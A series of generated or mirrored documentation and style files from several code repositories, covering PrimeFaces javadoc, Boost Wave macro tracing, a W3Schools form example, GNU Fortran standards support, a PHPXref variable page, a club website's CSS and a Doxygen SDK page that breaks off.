org.primefaces.component.dnd">Droppable.PropertyKeys</A>[]</CODE></FONT></TD> <TD><CODE><B>Droppable.PropertyKeys.</B><B><A HREF="../../../../../org/primefaces/component/dnd/Droppable.PropertyKeys.html#values()">values</A></B>()</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Returns an array containing the constants of this enum type, in the order they are declared.</TD> </TR> </TABLE> &nbsp; <P> <HR> <!-- ======= START OF BOTTOM NAVBAR ====== --> <A NAME="navbar_bottom"><!-- --></A> <A HREF="#skip-navbar_bottom" title="Skip navigation links"></A> <TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY=""> <TR> <TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A NAME="navbar_bottom_firstrow"><!-- --></A> <TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY=""> <TR ALIGN="center" VALIGN="top"> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../org/primefaces/component/dnd/Droppable.PropertyKeys.html" title="enum in org.primefaces.component.dnd"><FONT CLASS="NavBarFont1"><B>Class</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> &nbsp;<FONT CLASS="NavBarFont1Rev"><B>Use</B></FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../overview-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A>&nbsp;</TD> </TR> </TABLE> </TD> <TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM> </EM> </TD> </TR> <TR> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> &nbsp;PREV&nbsp; &nbsp;NEXT</FONT></TD> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> <A HREF="../../../../../index.html?org/primefaces/component/dnd//class-useDroppable.PropertyKeys.html" target="_top"><B>FRAMES</B></A> &nbsp; &nbsp;<A HREF="Droppable.PropertyKeys.html" target="_top"><B>NO FRAMES</B></A> &nbsp; &nbsp;<SCRIPT type="text/javascript"> <!-- if(window==top) { document.writeln('<A HREF="../../../../../allclasses-noframe.html"><B>All Classes</B></A>'); } //--> </SCRIPT> <NOSCRIPT> <A HREF="../../../../../allclasses-noframe.html"><B>All Classes</B></A> </NOSCRIPT> </FONT></TD> </TR> </TABLE> <A NAME="skip-navbar_bottom"></A> <!-- ======== END OF BOTTOM NAVBAR ======= --> <HR> Copyright &#169; 2012. All Rights Reserved. </BODY> </HTML>
lib/boost/boost_1_38_0/libs/wave/doc/tracing_facility.html
scs/uclinux
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>The Tracing Facility</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <link href="theme/style.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellspacing="2" background="theme/bkd2.gif"> <tr> <td width="21"> <h1></h1></td> <td width="885"> <font face="Verdana, Arial, Helvetica, sans-serif"><b><font size="6">The Tracing Facility</font></b></font></td> <td width="96"><a href="http://www.boost.org"><img src="theme/wave.gif" width="93" height="68" align="right" border="0"></a></td> </tr> </table> <br> <table border="0"> <tr> <td width="10"></td> <td width="30"><a href="../index.html"><img src="theme/u_arr.gif" border="0"></a></td> <td width="30"><a href="wave_driver.html"><img src="theme/l_arr.gif" border="0"></a></td> <td width="30"><a href="acknowledgements.html"><img src="theme/r_arr.gif" border="0"></a></td> </tr> </table> <p>If you ever had the need to debug a macro expansion you had to discover, that your tools provide only little or no support for this task. For this reason the <i>Wave</i> library has a tracing facility, which allows to get selectively some information about the expansion of a certain macro or several macros. </p> <p>The tracing of macro expansions generates a possibly huge amount of information, so it is recommended, that you explicitely enable/disable the tracing for the macro in question only. This may be done with the help of a special, <tt>Wave</tt> specific #pragma:</p> <pre><span class="preprocessor"> #pragma</span> wave trace(enable) <span class="comment">// enable the tracing</span> <span class="comment">// the macro expansions here will be traced</span> <span class="comment">// ...</span> <span class="preprocessor"> #pragma</span> wave trace(disable) <span class="comment">// disable the tracing</span></pre> <p>In C99 mode or when specifying the <tt>--variadics</tt> command line option you may additionally use the <tt>operator&nbsp;_Pragma()</tt> variant to enable/disable the tracing output:</p> <pre><span class="preprocessor"> #define</span> CONCAT(x, y) \ <span class="preprocessor">_Pragma</span>(<span class="string">&quot;wave trace(enable)&quot;</span>) \ x \ <span class="preprocessor">_Pragma</span>(<span class="string">&quot;wave trace(disable)&quot;</span>) \ <span class="keyword">##</span> y</pre> <p>This way you have the possibility to enable the tracing during the expansion of a part of a macro only. In the sample shown there is traced the expansion of the macro argument <tt>'x'</tt> only. Note, that the <tt>operator _Pragma()</tt> directives expand to nothing inside the macro expansion result.</p> <p>To see, what the <tt>Wave</tt> driver generates while expanding a simple macro, let's have a look at the tracing output for the following example:</p> <pre ><span class="comment"> // test.cpp</span> <span class="preprocessor"> #define</span> X(x) x<br><span class="preprocessor"> #define</span> Y() 2<br><span class="preprocessor"> #define</span> CONCAT_(x, y) x <span class="keyword">##</span> y <span class="preprocessor"> #define</span> CONCAT(x, y) CONCAT_(x, y) <span class="preprocessor"> #pragma</span> wave trace(enable) <span class="comment"> // this macro expansion is to be traced</span> CONCAT(X(1), Y()) <span class="comment">// should expand to 12</span> <span class="preprocessor"> #pragma</span> wave trace(disable)</pre> <p>When preprocessed with <tt>'wave -t test.trace test.cpp'</tt> the <tt>Wave</tt> driver generates a file <tt>test.trace</tt>, which contains (without the line numbers in front of the lines):</p> <pre> 1: test.cpp:8:1: CONCAT(X(1), Y()) 2: test.cpp:5:9: see macro definition: CONCAT(x, y) 3: invoked with 4: [ 5: x = X(1) 6: y = Y() 7: ] 8: [ 9: test.cpp:2:9: see macro definition: X(x) 10: invoked with 11: [ 12: x = 1 13: ] 14: [ 15: 1 16: rescanning 17: [ 18: 1 19: ] 20: ] 21: test.cpp:3:9: see macro definition: Y() 22: [ 23: 2 24: rescanning 25: [ 26: 2 27: ] 28: ] 29: CONCAT_(1, 2) 30: rescanning 31: [ 32: test.cpp:4:9: see macro definition: CONCAT_(x, y) 33: invoked with 34: [ 35: x = 1 36: y = 2 37: ] 38: [ 39: 12 40: rescanning 41: [ 42: 12 43: ] 44: ] 45: 12 46: ] 47: ] </pre> <p>The generated trace output is very verbose, but allows to follow every step of the actual macro expansion process. The first line in this tracing example contains the reference to the position, from where the macro expansion was initiated. Additionally the following information is contained for every single macro expansion:</p> <ul> <li>The reference to the position (line and column numbers), where the macro to expand was defined first (see lines 2, 9, 21 and 32).</li> <li>The real parameters supplied for this macro expansion (see lines 3, 10 and 33), this information is traced inside the <tt>invoked with</tt> block, where the corresponding formal and actual parameters are listed.</li> <li>The expansion of the given arguments (if any and if these are defined as macros). This repeats the full tracing information for the argument macro expansion, only indended by one level. Note though, that the macro expansion of the actual arguments is traced, regardless of the fact, whether this argument is really to be inserted into the replacement list after its expansion or as it was initially supplied (see C++ Standard [16.3.1.1]: &quot;A parameter in the replacement list, unless preceded by a <tt>#</tt> or <tt>##</tt> preprocessing token or followed by a <tt>##</tt> preprocessing token, is replaced by the corresponding argument after all macros contained therein have been expanded&quot; <a href="references.html#iso_cpp">[1]</a>). </li> <li>The result of the argument substitution (see lines 15, 23, 29 and 39), i.e. the substituted replacement list.</li> <li>The rescanning process, which again includes the full subsequent macro expansion process of all found macros (see C++ Standard [16.3.4.1]: &quot;After all parameters in the replacement list have been substituted, the resulting preprocessing token sequence is rescanned with all subsequent preprocessing tokens of the source file for more macro names to replace.&quot; <a href="references.html#iso_cpp">[1]</a>).</li> <li>The result of the actual macro expansion (this is the last line inside the corresponding rescanning block - see lines 18, 26, 42 and 45).</li> </ul> <p>Every found macro to expand will add an additional indentation level inside the trace output.</p> <table border="0"> <tr> <td width="10"></td> <td width="30"><a href="../index.html"><img src="theme/u_arr.gif" border="0"></a></td> <td width="30"><a href="wave_driver.html"><img src="theme/l_arr.gif" border="0"></a></td> <td width="30"><a href="acknowledgements.html"><img src="theme/r_arr.gif" border="0"></a></td> </tr> </table> <hr size="1"> <p class="copyright">Copyright &copy; 2003-2009 Hartmut Kaiser<br> <br> <font size="2">Distributed under the Boost Software License, Version 1.0. (See accompanying file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt) </font> </p> <p class="copyright"><span class="updated">Last updated: <!-- #BeginDate format:fcAm1m -->Tuesday, March 21, 2006 9:25<!-- #EndDate --> </span> </p> </body> </html>
Coding/W3School/W3Schools_Offline_2015/www.w3schools.com/jsref/tryjsref_input_time_disabled.html
platinhom/ManualHom
<!DOCTYPE html> <html> <!-- Mirrored from www.w3schools.com/jsref/tryjsref_input_time_disabled.htm by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 23 Jan 2015 08:38:24 GMT --> <body> <input type="time" id="myTime"> <p>Click the button to disable the time field.</p> <button onclick="myFunction()">Try it</button> <p><strong>Note:</strong> elements with type="time" are not supported in Internet Explorer or Firefox.</p> <script> function myFunction() { document.getElementById("myTime").disabled = true; } </script> </body> <!-- Mirrored from www.w3schools.com/jsref/tryjsref_input_time_disabled.htm by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 23 Jan 2015 08:38:24 GMT --> </html>
doc/me/soxey6/engine/objects/package-frame.html
spanishtech/RGGE-snake
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!--NewPage--> <HTML> <HEAD> <!-- Generated by javadoc (build 1.6.0_65) on Fri May 15 14:23:25 EST 2015 --> <TITLE> me.soxey6.engine.objects </TITLE> <META NAME="date" CONTENT="2015-05-15"> <LINK REL ="stylesheet" TYPE="text/css" HREF="../../../../stylesheet.css" TITLE="Style"> </HEAD> <BODY BGCOLOR="white"> <FONT size="+1" CLASS="FrameTitleFont"> <A HREF="../../../../me/soxey6/engine/objects/package-summary.html" target="classFrame">me.soxey6.engine.objects</A></FONT> <TABLE BORDER="0" WIDTH="100%" SUMMARY=""> <TR> <TD NOWRAP><FONT size="+1" CLASS="FrameHeadingFont"> Classes</FONT>&nbsp; <FONT CLASS="FrameItemFont"> <BR> <A HREF="Cheat.html" title="class in me.soxey6.engine.objects" target="classFrame">Cheat</A> <BR> <A HREF="Event.html" title="class in me.soxey6.engine.objects" target="classFrame">Event</A> <BR> <A HREF="GameObject.html" title="class in me.soxey6.engine.objects" target="classFrame">GameObject</A> <BR> <A HREF="Scene.html" title="class in me.soxey6.engine.objects" target="classFrame">Scene</A> <BR> <A HREF="Setting.html" title="class in me.soxey6.engine.objects" target="classFrame">Setting</A></FONT></TD> </TR> </TABLE> </BODY> </HTML>
share/doc/gcc-linaro-arm-linux-gnueabihf/html/gfortran/Standards.html
eckucukoglu/arm-linux-gnueabihf
<html lang="en"> <head> <title>Standards - The GNU Fortran Compiler</title> <meta http-equiv="Content-Type" content="text/html"> <meta name="description" content="The GNU Fortran Compiler"> <meta name="generator" content="makeinfo 4.13"> <link title="Top" rel="start" href="index.html#Top"> <link rel="up" href="Introduction.html#Introduction" title="Introduction"> <link rel="prev" href="Project-Status.html#Project-Status" title="Project Status"> <link href="http://www.gnu.org/software/texinfo/" rel="generator-home" title="Texinfo Homepage"> <!-- Copyright (C) 1999-2014 Free Software Foundation, Inc. Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License, Version 1.3 or any later version published by the Free Software Foundation; with the Invariant Sections being ``Funding Free Software'', the Front-Cover Texts being (a) (see below), and with the Back-Cover Texts being (b) (see below). A copy of the license is included in the section entitled ``GNU Free Documentation License''. (a) The FSF's Front-Cover Text is: A GNU Manual (b) The FSF's Back-Cover Text is: You have freedom to copy and modify this GNU Manual, like GNU software. Copies published by the Free Software Foundation raise funds for GNU development.--> <meta http-equiv="Content-Style-Type" content="text/css"> <style type="text/css"><!-- pre.display { font-family:inherit } pre.format { font-family:inherit } pre.smalldisplay { font-family:inherit; font-size:smaller } pre.smallformat { font-family:inherit; font-size:smaller } pre.smallexample { font-size:smaller } pre.smalllisp { font-size:smaller } span.sc { font-variant:small-caps } span.roman { font-family:serif; font-weight:normal; } span.sansserif { font-family:sans-serif; font-weight:normal; } --></style> </head> <body> <div class="node"> <a name="Standards"></a> <p> Previous:&nbsp;<a rel="previous" accesskey="p" href="Project-Status.html#Project-Status">Project Status</a>, Up:&nbsp;<a rel="up" accesskey="u" href="Introduction.html#Introduction">Introduction</a> <hr> </div> <h3 class="section">1.6 Standards</h3> <p><a name="index-Standards-11"></a> <ul class="menu"> <li><a accesskey="1" href="Varying-Length-Character-Strings.html#Varying-Length-Character-Strings">Varying Length Character Strings</a> </ul> <p>The GNU Fortran compiler implements ISO/IEC 1539:1997 (Fortran 95). As such, it can also compile essentially all standard-compliant Fortran 90 and Fortran 77 programs. It also supports the ISO/IEC TR-15581 enhancements to allocatable arrays. <p>GNU Fortran also have a partial support for ISO/IEC 1539-1:2004 (Fortran 2003), ISO/IEC 1539-1:2010 (Fortran 2008), the Technical Specification <code>Further Interoperability of Fortran with C</code> (ISO/IEC TS 29113:2012). Full support of those standards and future Fortran standards is planned. The current status of the support is can be found in the <a href="Fortran-2003-status.html#Fortran-2003-status">Fortran 2003 status</a>, <a href="Fortran-2008-status.html#Fortran-2008-status">Fortran 2008 status</a> and <a href="TS-29113-status.html#TS-29113-status">TS 29113 status</a> sections of the documentation. <p>Additionally, the GNU Fortran compilers supports the OpenMP specification (version 4.0, <a href="http://openmp.org/wp/openmp-specifications/">http://openmp.org/wp/openmp-specifications/</a>). </body></html>
_variables/include_emptyurl.html
mgsolipa/b2evolution_phpxref
<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <html> <head> <title>PHPXRef 0.7.1 : Unnamed Project : Variable Reference: $include_emptyurl</title> <link rel="stylesheet" href="../sample.css" type="text/css"> <link rel="stylesheet" href="../sample-print.css" type="text/css" media="print"> <style id="hilight" type="text/css"></style> <meta http-equiv="content-type" content="text/html;charset=iso-8859-1"> </head> <body bgcolor="#ffffff" text="#000000" link="#801800" vlink="#300540" alink="#ffffff"> <table class="pagetitle" width="100%"> <tr> <td valign="top" class="pagetitle"> [ <a href="../index.html">Index</a> ] </td> <td align="right" class="pagetitle"> <h2 style="margin-bottom: 0px">PHP Cross Reference of Unnamed Project</h2> </td> </tr> </table> <!-- Generated by PHPXref 0.7.1 at Sat Nov 21 22:13:19 2015 --> <!-- PHPXref (c) 2000-2010 Gareth Watts - gareth@omnipotent.net --> <!-- http://phpxref.sourceforge.net/ --> <script src="../phpxref.js" type="text/javascript"></script> <script language="JavaScript" type="text/javascript"> <!-- ext='.html'; relbase='../'; subdir='_variables'; filename='index.html'; cookiekey='phpxref'; handleNavFrame(relbase, subdir, filename); logVariable('include_emptyurl'); // --> </script> <script language="JavaScript" type="text/javascript"> if (gwGetCookie('xrefnav')=='off') document.write('<p class="navlinks">[ <a href="javascript:navOn()">Show Explorer<\/a> ]<\/p>'); else document.write('<p class="navlinks">[ <a href="javascript:navOff()">Hide Explorer<\/a> ]<\/p>'); </script> <noscript> <p class="navlinks"> [ <a href="../nav.html" target="_top">Show Explorer</a> ] [ <a href="index.html" target="_top">Hide Navbar</a> ] </p> </noscript> [<a href="../index.html">Top level directory</a>]<br> <script language="JavaScript" type="text/javascript"> <!-- document.writeln('<table align="right" class="searchbox-link"><tr><td><a class="searchbox-link" href="javascript:void(0)" onMouseOver="showSearchBox()">Search</a><br>'); document.writeln('<table border="0" cellspacing="0" cellpadding="0" class="searchbox" id="searchbox">'); document.writeln('<tr><td class="searchbox-title">'); document.writeln('<a class="searchbox-title" href="javascript:showSearchPopup()">Search History +</a>'); document.writeln('<\/td><\/tr>'); document.writeln('<tr><td class="searchbox-body" id="searchbox-body">'); document.writeln('<form name="search" style="margin:0px; padding:0px" onSubmit=\'return jump()\'>'); document.writeln('<a class="searchbox-body" href="../_classes/index.html">Class<\/a>: '); document.writeln('<input type="text" size=10 value="" name="classname"><br>'); document.writeln('<a id="funcsearchlink" class="searchbox-body" href="../_functions/index.html">Function<\/a>: '); document.writeln('<input type="text" size=10 value="" name="funcname"><br>'); document.writeln('<a class="searchbox-body" href="../_variables/index.html">Variable<\/a>: '); document.writeln('<input type="text" size=10 value="" name="varname"><br>'); document.writeln('<a class="searchbox-body" href="../_constants/index.html">Constant<\/a>: '); document.writeln('<input type="text" size=10 value="" name="constname"><br>'); document.writeln('<a class="searchbox-body" href="../_tables/index.html">Table<\/a>: '); document.writeln('<input type="text" size=10 value="" name="tablename"><br>'); document.writeln('<input type="submit" class="searchbox-button" value="Search">'); document.writeln('<\/form>'); document.writeln('<\/td><\/tr><\/table>'); document.writeln('<\/td><\/tr><\/table>'); // --> </script> <div id="search-popup" class="searchpopup"><p id="searchpopup-title" class="searchpopup-title">title</p><div id="searchpopup-body" class="searchpopup-body">Body</div><p class="searchpopup-close"><a href="javascript:gwCloseActive()">[close]</a></p></div> <h3>Variable Cross Reference</h3> <h2><a href="index.html#include_emptyurl">$include_emptyurl</a></h2> <b>Defined at:</b><ul> <li><a href="../inc/comments/views/_comments_sidebar.view.php.html">/inc/comments/views/_comments_sidebar.view.php</A> -> <a href="../inc/comments/views/_comments_sidebar.view.php.source.html#l47"> line 47</A></li> </ul> <br><b>Referenced 7 times:</b><ul> <li><a href="../inc/comments/model/_commentquery.class.php.html">/inc/comments/model/_commentquery.class.php</a> -> <a href="../inc/comments/model/_commentquery.class.php.source.html#l33"> line 33</a></li> <li><a href="../inc/comments/model/_commentquery.class.php.html">/inc/comments/model/_commentquery.class.php</a> -> <a href="../inc/comments/model/_commentquery.class.php.source.html#l265"> line 265</a></li> <li><a href="../inc/comments/model/_commentquery.class.php.html">/inc/comments/model/_commentquery.class.php</a> -> <a href="../inc/comments/model/_commentquery.class.php.source.html#l269"> line 269</a></li> <li><a href="../inc/comments/model/_commentquery.class.php.html">/inc/comments/model/_commentquery.class.php</a> -> <a href="../inc/comments/model/_commentquery.class.php.source.html#l269"> line 269</a></li> <li><a href="../inc/comments/model/_commentquery.class.php.html">/inc/comments/model/_commentquery.class.php</a> -> <a href="../inc/comments/model/_commentquery.class.php.source.html#l292"> line 292</a></li> <li><a href="../inc/comments/views/_comments_sidebar.view.php.html">/inc/comments/views/_comments_sidebar.view.php</a> -> <a href="../inc/comments/views/_comments_sidebar.view.php.source.html#l47"> line 47</a></li> <li><a href="../inc/comments/views/_comments_sidebar.view.php.html">/inc/comments/views/_comments_sidebar.view.php</a> -> <a href="../inc/comments/views/_comments_sidebar.view.php.source.html#l179"> line 179</a></li> </ul> <!-- A link to the phpxref site in your customized footer file is appreciated ;-) --> <br><hr> <table width="100%"> <tr><td>Generated: Sat Nov 21 22:13:19 2015</td> <td align="right"><i>Cross-referenced by <a href="http://phpxref.sourceforge.net/">PHPXref 0.7.1</a></i></td> </tr> </table> </body></html>
templates/efcpw/css/extracted-efcpw.css
esorone/efcpw
/* @override http://localhost/efcpw/templates/efcpw/css/efcpw.css */ @import url("../css/font-awesome.min.css"); lefhtml { position: relative; height: 100%; } body { padding-top: 60px; padding-bottom: 40px; margin: 0 0 100px; height: 100%; } #bgMax { opacity: 0.5; } p { text-align: left; } .bloc-lg { padding: 100px 1%; } iframe { background-color: #ffffff; width: 100%; height: 100%; border: none; } #ios { overflow: hidden; width: 100%; height: 100%; border: none; background-color: #ffffff; } .intro { color: #ff0000; } .uitslagen, .wedstrijden { height: calc(250px); } .span12 { width: calc(100%); background-color: #ffffff; } .span11 { width: calc(91.66666667%); } .span10 { width: calc(83.33333333%); } .span9 { width: calc(75%); } .span8 { width: calc(66.66666667%); } .span7 { width: calc(58.33333333%); } .span6 { width: calc(50%); } .span5 { width: calc(41.66666667%); } .span4 { width: calc(33.33333333%); } .span3, #outer { width: calc(25%); float: left; } .span2 { width: calc(16.66666667%); } .span1 { width: calc(8.33333333%); } /* Import Font Awesome CSS */ #nav-bloc, #bloc-0, #bloc-1, #bloc-2, #bloc-3, #bloc-4, #bloc-5, #bloc-6, #bloc-7, #bloc-8 { background-color: transparent; } #bgMax { opacity: 0.2 !important; } .row.logo_row { border-bottom: solid 3px #ff0000; margin-top: 1px; } hr { background-color: #ff0000; -webkit-box-shadow: 3px 2px 6px 0px rgba(134, 50, 50, 0.34); -moz-box-shadow: 3px 2px 6px 0px rgba(134, 50, 50, 0.34); box-shadow: 3px 2px 6px 0px rgba(134, 50, 50, 0.34); width: 60%; margin-left: auto; margin-right: auto; height: 1px; margin-top: 5%; } .newsintro h1 { color: #4a4a4a; } h1, h2, h3, h4, h5 { font-family: 'Prosto One'; } .item-page { background-color: #ffffff; padding: 10px; } span.title a { font-family: 'Prosto One'; font-size: 20px; } h3.allmode-title { padding-top: 4%!important; } .title.fbox > a, .allmode-title, title > a, span.title a { font-size: 12px; font-family: 'Prosto One'; color: #000000 !important; padding-top: 30%; } .module-text { font-size: 14px; } .allmode-default .allmode-title a { font-size: 20px; font-family: 'Prosto One'; color: rgba(0, 0, 0, 0.6); font-weight: 200; padding-top: 1%; } div.allmode-text > span > a { color: #ffffff !important; } .allmode-box, .allmode-default { background-color: #ffffff; margin-top: 0px; } .module-text { margin-top: 5%; } .title_hidden { border: none; } img { max-width: 100%; } div.custom.wedstrijden p a { color: #ffffff; } div.custom.uitslagen p a { color: #ffffff; } .newsintro > h1:nth-child(1) { padding: 10px; } a.btn.btn-efcpw { color: #ffffff; } .btn-efcpw:hover, .btn-efcpw:focus, .btn-efcpw:active, .btn-efcpw.active, .open .dropdown-toggle.btn-efcpw { color: #ffffff; background-color: #d43f3a; border-color: #d43f3a; } .btn-efcpw:active, .btn-efcpw.active, .open .dropdown-toggle.btn-efcpw { background-image: none; } .btn-efcpw.disabled, .btn-efcpw[disabled], fieldset[disabled] .btn-efcpw, .btn-efcpw.disabled:hover, .btn-efcpw[disabled]:hover, fieldset[disabled] .btn-efcpw:hover, .btn-efcpw.disabled:focus, .btn-efcpw[disabled]:focus, fieldset[disabled] .btn-efcpw:focus, .btn-efcpw.disabled:active, .btn-efcpw[disabled]:active, fieldset[disabled] .btn-efcpw:active, .btn-efcpw.disabled.active, .btn-efcpw[disabled].active, fieldset[disabled] .btn-efcpw.active { background-color: #E51415; border-color: #D43F3A; } .btn-efcpw .badge { color: #e51415; background-color: #ffffff; } .newsitems { background-color: #ffffff; } .custom h2 a { color: #ffffff; font-family: 'Prosto One'; font-size: 32px; } .container { background-color: none; padding-top: 1%; padding-right: 0; padding-left: 0; min-height: 100%; } .maincontainer { background-color: none; padding-top: 1%; padding-right: 0; padding-left: 0; overflow: auto; min-height: 100%; } #js-mainnav.megamenu.white { background-color: #ffffff; background-image: none; border-radius: 0; font-size: 0; line-height: 0; font-family: 'Prosto One'; border-bottom-left-radius: 0px; border-bottom-right-radius: 0px; } #js-mainnav.megamenu.white ul.level0 li.first { border-top-left-radius: 0px; } #js-mainnav.megamenu.white ul.level0 li:hover, #js-mainnav.megamenu.white ul.level0 li.active, #js-mainnav.megamenu.white ul.level0 li.over, #js-mainnav.megamenu.white ul.level0 li.haschild-over { height: 70px; } #js-mainnav.megamenu.white ul.level0 li.mega { text-align: center; height: 70px; } #js-mainnav.megamenu.white ul.level0 li.mega > a.haschild::after, #js-mainnav.megamenu.white ul.level0 li.mega > span.mega.haschild::after { content: ''; display: inline-block; border-left: 6px solid transparent; border-right: 6px solid transparent; border-top: 9px solid #ff0000; /* change color here, modified for a black arrow */ position: absolute; margin-top: 15px !important; top: 14px !important; right: 30px; } #js-mainnav.megamenu.white ul.level0 > li a, #js-mainnav.megamenu.white ul.level0 > li span { text-transform: uppercase; } #js-mainnav.megamenu.white ul.level1 > li a, #js-mainnav.megamenu.white ul.level1 > li span { text-transform: none; text-align: center; } #js-mainnav.megamenu UL.level0 LI.mega SPAN.menu-title { display: block; margin-top: 15px; } #js-mainnav.megamenu.white UL.level0 LI.haschild A.mega SPAN.menu-title, #js-mainnav.megamenu.white UL.level0 LI.haschild-over A.mega SPAN.menu-title { background-image: none; padding: 0; margin-top: 15px; } #js-mainnav.megamenu.white UL.level1 LI.mega A.mega SPAN.menu-title { background: none; padding: 0; margin-top: 5px; } #js-mainnav.megamenu.white { border-radius: 0px; box-shadow: 0 0 6px rgba(76, 76, 76, 0.25); background-color: #fff; left: -1px; top: 1px; position: relative; } #js-mainnav.megamenu.white ul.level1 li:hover { background-color: #ff0000; } #js-mainnav.megamenu.white ul.level1 li.mega { text-align: left; border-radius: 0px; height: 100%; width: 100%; } #js-mainnav.megamenu.white ul.level0 li.mega:hover > span.mega, #js-mainnav.megamenu.white ul.level0 li.mega a.over, #js-mainnav.megamenu.white ul.level0 li.mega:hover > a { color: #898989; } #js-mainnav.megamenu.white ul.level1 li.mega:hover > span.mega, #js-mainnav.megamenu.white ul.level1 li.mega a.over, #js-mainnav.megamenu.white ul.level1 li.mega:hover > a { color: #ffffff; } #js-mainnav.megamenu.white ul.level0 > li a { padding-top: 40%; } #js-mainnav.megamenu { background-color: #ffffff; } #js-mainnav.megamenu ul.level0 li.mega { text-align: center; } .my-class { background-color: red; width: 500px; height: 600px; } .container-test { background-color: none; } .slidemax, .slidehoogte { overflow: hidden; } .wedstrijden { background: #E51415; border: 1px solid #979797; padding: 2%; margin-right: 15px; margin-bottom: 20px; } .wedstrijden h1, .uitslagen h1 { color: #ffffff; } .uitslagen { background: #024297; border: 1px solid #979797; margin-right: 15px; padding: 2%; } .blog-featured.tbox2, .blog-featured.tbox3 { background-color: #ffffff; padding: 10px; } div.blog-featured.tbox2 p, div.blog-featured.tbox3 p { margin-top: 20px; } span.readmore.btn { margin-top: 0px; } #outer { width: 100% !important; } /*--- Agenda ----*/ .ic-date { background-color: #ff0000; } #icagenda { background-color: #ffffff; } .ic-day, .ic-month, .ic-year { color: #ffffff; } div.share { padding-top: 2%; } div.ic-clearfix { padding: 1%; } .title_img { width: 50px; padding: 5px; float: left; } #bloc-5 { background-color: #ffffff; border-top: solid 5px #ff0000; margin-top: -20px; } .bshowcase { background-color: #ffffff; padding: 0; margin: 0; width: 100%; } .defaultLayout { width: 100%!important; margin: 2%; } .footer-distributed { background-color: #024297; box-shadow: 0 1px 1px 0 rgba(0, 0, 0, 0.12); width: 100%; text-align: left; height: 60px; border-top: solid 3px #ff0000; position: relative; bottom: 0; } .footer-left { background-color: #024297; } .footercontainer { width: auto; max-width: 1170px; padding: 0px 15px; background-color: #ffffff; margin: auto; } .mobiele_footer_social > p, .mobiele_footer > p { font-size: 4.9vw; text-align: center; color: #ffffff; } .mobiele_footer_social > p > a { font-size: 7.9vw; padding-left: 4%; } .mobiele_footer_social > p > a, .mobiele_footer > p > a { color: #ffffff; } label.col-md-12.control-label { text-align: center; padding-left: 3%; } div.title_keuzef { text-align: center; margin-left: 10%; margin-right: 10%; padding-bottom: 2%; } label.checkbox-inline { margin-left: 10%; } input { background-color: transparant; border: none; } span.btn.btn-efcpw{ position: absolute; bottom: 0; left: 10%; } span.menu-title { font-size: 0.7vw;; } div.custom.wedstrijden h1, div.custom.uitslagen h1 { font-size: 1.6vw;; }
doc/IncrementItemsGetResponse_8h.html
sd44/TaobaoCppQtSDK
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/> <meta http-equiv="X-UA-Compatible" content="IE=9"/> <meta name="generator" content="Doxygen 1.8.3.1"/> <title>Taobao Cpp/Qt SDK: TaoApiCpp/response/IncrementItemsGetResponse.h File Reference</title> <link href="tabs.css" rel="stylesheet" type="text/css"/> <script type="text/javascript" src="jquery.js"></script> <script type="text/javascript" src="dynsections.js"></script> <link href="search/search.css" rel="stylesheet" type="text/css"/> <script type="text/javascript" src="search/search.js"></script> <script type="text/javascript"> $(document).ready(function() { searchBox.OnSelectItem(0); }); </script> <link href="doxygen.css" rel="stylesheet" type="text/css" /> </head> <body> <div id="top"><!-- do not remove this div, it is closed by doxygen! --> <div id="titlearea"> <table cellspacing="0" cellpadding="0"> <tbody> <tr style="height: 56px;"> <td style="padding-left: 0.5em;"> <div id="projectname">Taobao Cpp/Qt SDK </div> </td> </tr> </tbody> </table> </div> <!-- end header part --> <!-- Generated by Doxygen 1.8.3.1 --> <script type="text/javascript"> var searchBox = new SearchBox("searchBox", "search",false,'Search'); </script> <div id="navrow1" class="tabs"> <ul class="tablist"> <li><a href="index.html"><span>Main&#160;Page</span></a></li> <li><a href="pages.html"><span>Related&#160;Pages</span></a></li> <li><a 